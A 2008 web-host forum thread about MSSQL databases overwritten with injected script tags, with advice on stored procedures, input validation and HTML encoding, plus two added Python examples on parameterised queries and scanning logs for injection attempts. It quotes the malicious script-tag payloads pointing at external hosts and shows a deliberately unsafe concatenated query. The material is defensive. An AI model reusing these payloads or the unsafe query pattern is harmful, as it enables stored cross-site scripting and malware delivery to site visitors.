MSSQL: Virus on SQL Server?
Started by danwooller at 05-17-2008 2:59 PM. Topic has 10 replies.
05-17-2008, 2:59 PM
danwooller
Joined on 05-17-2008
Posts 1
Hello.
Has anyone else had their MSSQL database corrupted with code for a script inserted into tables?
The first I had was "<scri//pt src=http://www.adword71.com/b.js></script>" and it overwrote a lot of data. As fast as I could clear it out with SQL queries, it re-appeared. That made me suspect there was a virus on the SQL server. Of course, this was denied. If it isn't a virus, what else could cause it?
I haven't been able to get a lucid response (as usual) out of these guys, and as the call is now three days old, I thought I would turn to fellow users. Anyone else on sql387?
Luckily my hosting is up for renewal in a few weeks, so if someone from the hosting co doesn't offer a reasonable explanation, I can go somewhere else.
Dan
05-21-2008, 3:30 PM
admin
Joined on 08-10-2005
Posts 244
This is not a virus. There's a big SQL injection attack everywhere right now, so it's 99% likely to be your code being open to SQL injection attack. You'll have to fix your code. Go to google.com and search for "SQL injection attack". You should get more information on that and learn how to fix your code to prevent SQL injection attacks.
05-30-2008, 6:51 AM
kyz
Joined on 05-30-2008
Posts 2
My database was hacked also, although we have taken measures against sql injection. Server is 385. What's going on?
05-30-2008, 11:31 AM
admin
Joined on 08-10-2005
Posts 244
All of our servers have the same setup. If they can crack one, they can crack all. If they can crack all, all of the customers' DBs would be hacked. So if that were the case, we would see thousands of postings here, not just a few. So I would suggest you go back and recheck all your code for injection or other forms of script attacks. If you want, you guys can give me your website URL as well. I can check to make sure the security guard is already applied to your server. Note that we encountered some servers that are not compatible with it. So the best thing is, let me check. If your server doesn't have it, we can move your account to one that has it.
05-30-2008, 1:57 PM
DeveloperBarn
Joined on 05-29-2008
Reston, VA
Posts 24
How are you all going about securing your data? There are several things you can do to protect your data.
1. Use stored procedures and pass user input to the stored procedures as parameters. No matter what a user inputs, it will be treated as input and not as part of the SQL query.
2. The user account that your users connect to the database through should have only execute permissions on the stored procedures. They should not have access to perform CRUD (Create, Read, Update, Delete) operations on the actual tables.
3. Only allow your users to enter data that your script expects. For example, if a 5-digit zip code is expected, then only characters 0-9 should be allowed and it should only be 5 characters long. Do this verification on both client-side script as well as server-side script.
4. If coding with ASP or ASP.NET, use Server.HtmlEncode when outputting database data to the markup. This will encode characters like < and > to &lt; and &gt;, which prevents cross-site scripting (XSS) attacks.
There are several other things you can do, but I hope this will be enough to get you started.
Jason, Founder, DeveloperBarn Forums, http://www.developerbarn.com
No longer a WebHost4Life Customer
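The four measures in Jason's list, worked through as an added example (this is not code from the thread, from WebHost4Life or from any of the sites mentioned). An in-memory SQLite database stands in for the MSSQL server, and the table name, column names and sample rows are made up for the demonstration; measure 2 (an execute-only database login) is a server-side GRANT on MSSQL and has no SQLite equivalent, so it appears only as a comment. The input fed through both the unsafe and the hardened path is the query-string value Chain quotes later in this thread.

```python
import html
import re
import sqlite3

# Constructed sample content table; the real sites' schemas are not on the page.
SAMPLE_ROWS = [
    (1, 342, "Garden spade"),
    (2, 342, "Compost bin"),
    (3, 7, "Watering can"),
]

# The query-string value Chain captured later in this thread, reused as input.
CAPTURED_INPUT = "342<script src=http://www.update34.com/b.js></script>"


def make_db():
    """In-memory SQLite database standing in for the MSSQL server."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (id INTEGER PRIMARY KEY, category INTEGER, description TEXT)"
    )
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def products_by_category_unsafe(conn, category):
    # Vulnerable pattern: the request value is spliced into the SQL text, so
    # whatever the visitor sends becomes part of the statement the server runs.
    sql = "SELECT id, description FROM products WHERE category = " + category
    return conn.execute(sql).fetchall()


def validate_category(raw):
    # Measure 3: accept only what the page expects (a short run of digits)
    # and reject everything else before it gets near the database.
    if not re.fullmatch(r"\d{1,6}", raw):
        raise ValueError("category must be 1-6 digits")
    return int(raw)


def products_by_category_safe(conn, raw_category):
    # Measure 1: a parameterised query, the equivalent of passing the value as
    # a stored-procedure parameter; the value can never change the statement.
    # Measure 2 would be done on the server: the web login gets EXECUTE on the
    # procedure only, and no direct table permissions (not representable here).
    category = validate_category(raw_category)
    return conn.execute(
        "SELECT id, description FROM products WHERE category = ? ORDER BY id",
        (category,),
    ).fetchall()


def render_description(text):
    # Measure 4: encode on output (what Server.HtmlEncode does), so any markup
    # stored in the database is shown as text rather than run by the browser.
    return html.escape(text, quote=True)


def find_injected_rows(conn):
    # Clean-up aid for the situation Dan and rhanson describe: list the rows
    # whose text column already carries a script tag.
    return conn.execute(
        "SELECT id, description FROM products WHERE description LIKE '%<script%' ORDER BY id"
    ).fetchall()


def demo():
    """Run the captured value through both paths and collect what happens."""
    conn = make_db()
    results = {}
    try:
        products_by_category_unsafe(conn, CAPTURED_INPUT)
        results["unsafe"] = "executed"
    except sqlite3.OperationalError as exc:
        # The visitor's text was parsed as SQL and broke the statement.
        results["unsafe"] = "sql error: " + str(exc)
    try:
        products_by_category_safe(conn, CAPTURED_INPUT)
        results["safe_rejected"] = "accepted"
    except ValueError as exc:
        results["safe_rejected"] = str(exc)
    results["safe_ok"] = products_by_category_safe(conn, "342")
    results["encoded"] = render_description("<script src=x></script>")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The unsafe path shows the point of Jason's first measure from the other side: the server tries to parse the visitor's text as SQL. With the parameter placeholder the same text is only ever compared as a value, and with the validation step in front of it the request never reaches the database at all.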
05-31-2008, 11:10 PM
rhanson
Joined on 06-01-2008
Posts 2
My database also got hacked. Not totally sure how. It looked like someone ran an SQL update statement, which could not have been done from my application, since none of them allow ad hoc SQL.
I was able to restore a recent backup to get everything working again and temporarily removed any program that updates the database except for my bulletin board. Hopefully that wasn't the source of the problem.
I'm wondering if someone hacked in through FTP to get the passwords from the application. I will be changing the programs that should only read to give them a more restricted userid to hopefully slow the hackers down a bit.
06-01-2008, 1:34 AM
admin
Joined on 08-10-2005
Posts 244
What's your URL? It's most likely an SQL injection attack.
06-01-2008, 5:50 PM
rhanson
Joined on 06-01-2008
Posts 2
The only URLs that allowed updating of content are not directly accessible from a website. You have to know the URL. These pages are used to update content for the site. The public sites, primarily www.madeleinepeyroux.org have no update capability.
Also, those pages that allowed update do not do ad hoc SQL. The SQL is fully controlled by the programs. If someone got my password (now changed) they could have changed one record at a time. Having looked at the data before restoring an undamaged database, it looked very much like someone did a mass update, adding a JavaScript to select columns in the database: the columns that would display through the public web pages.
I have since changed the password, moved the update pages and put an IP restriction on using the update programs.
In thinking about this whole mess, I'm wondering if someone didn't get hold of my FTP (which is secure) password and was therefore able to find the connection string, username and password to the database by looking at the ASP source code. With this in hand they could have mass updated my database without a SQL injection attack.
Anyone have any ideas how to not embed the connection information in the ASP source and still get access to the database???
06-01-2008, 6:48 PM
deanman
Joined on 04-11-2007
Posts 187
Programmatically Encrypting and Decrypting Configuration Sections:
http://asp.net/learn/data-access/tutorial-73-vb.aspx (VB version)
http://asp.net/learn/data-access/tutorial-73-cs.aspx (C# version)
You can hard-code the connection strings too -- and run an obfuscator over the code --, but the encryp/decrypt thingy mentioned above should do the task under most circumstances.
I <3 WebHost4Life.com
07-06-2008, 3:25 AM
Chain
Joined on 07-06-2008
Posts 1
I believe you were a victim of a genuine SQL injection attack. I agree that the webhost4life security has NOT been breached.
I was recently commissioned to secure a site hosted on webhost4life that was a victim of this attack. I've included some of the captured information from these SQL injection attacks below.
It appears that the JavaScript in the QueryString below downloads and injects SQL into a simple unprotected SELECT statement. That updates the entire database, destroying all the database content by adding more JavaScript to all of it. The added script then executes when visitors view information from the database via the site's pages and attempts to download a trojan virus onto the visitor's computer from this address: http: // www. ucomddv .com . Don't go there unless you have good virus protection.
If anyone has more information please post. See the bad behavior below.
---------------------------------- BAD QueryString : ?category = 342<script src=http://www.update34.com/b.js></script>
---------------------------------------------------------------------
ALL_HTTP = HTTP_ACCEPT:*/* HTTP_ACCEPT_ENCODING:gzip, x-gzip HTTP_HOST:www.irishgardener.com HTTP_USER_AGENT:Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) HTTP_LLF_CACHE_CONTROL:max-stale=60 HTTP_CLIENT_IP:74.6.7.224 HTTP_X_FORWARDED_FOR:74.6.7.224 HTTP_YAHOOREMOTEIP:74.6.7.224 HTTP_YAHOOREMOTEIPSIG:gaI6c6dtJYcGwIHcejyjCg--~A
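Added example, not part of Chain's post or any site's code: a small scanner over constructed web-server log lines that flags requests whose query-string parameters carry a script tag or fail the digits-only form the page expects, so a site owner can find the requests behind a mass update like the one described above. The log layout (date, time, URI stem, query string, client IP, user agent) and the parameter names are assumptions for the demo; the third line reuses the captured query-string value, URL-encoded the way it would appear in a server log.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed log lines in a W3C-extended-style layout
# (date time cs-uri-stem cs-uri-query c-ip cs(User-Agent)); the thread quotes
# only one raw request, so these are made up for the demonstration.
SAMPLE_LOG = """\
2008-06-30 09:12:01 /products.asp category=342 10.0.0.5 Mozilla/4.0
2008-06-30 09:12:09 /products.asp category=7&page=2 10.0.0.6 Mozilla/4.0
2008-06-30 09:13:44 /products.asp category=342%3Cscript%20src%3Dhttp%3A%2F%2Fwww.update34.com%2Fb.js%3E%3C%2Fscript%3E 74.6.7.224 Mozilla/5.0
2008-06-30 09:14:02 /search.asp q=garden%20spade 10.0.0.7 Mozilla/4.0
"""

# Parameters the site expects to be purely numeric (an assumption for the demo).
NUMERIC_PARAMS = {"category", "page"}
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def parse_line(line):
    """Split one log line into its fields; the user agent may contain spaces."""
    date, time, stem, query, ip, agent = line.split(" ", 5)
    return {"when": f"{date} {time}", "stem": stem, "query": query, "ip": ip, "agent": agent}


def inspect_query(query):
    """Return the reasons a query string looks like an injection attempt (empty if clean)."""
    reasons = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl already URL-decodes once; a second pass catches values
        # that were encoded twice to slip past simple filters.
        decoded = unquote(value)
        if SCRIPT_TAG.search(decoded):
            reasons.append(f"{name}: contains a script tag")
        if name in NUMERIC_PARAMS and not decoded.isdigit():
            reasons.append(f"{name}: expected digits only")
    return reasons


def scan_log(text):
    """Return (timestamp, client IP, URI stem, reasons) for each suspicious request."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        reasons = inspect_query(rec["query"])
        if reasons:
            findings.append((rec["when"], rec["ip"], rec["stem"], reasons))
    return findings


if __name__ == "__main__":
    for when, ip, stem, reasons in scan_log(SAMPLE_LOG):
        print(when, ip, stem, "; ".join(reasons))
```

The digits-only check is the same expectation Jason's third point describes, applied after the fact to the log instead of at request time; it catches attempts that do not happen to contain a literal script tag, which is why both checks are kept.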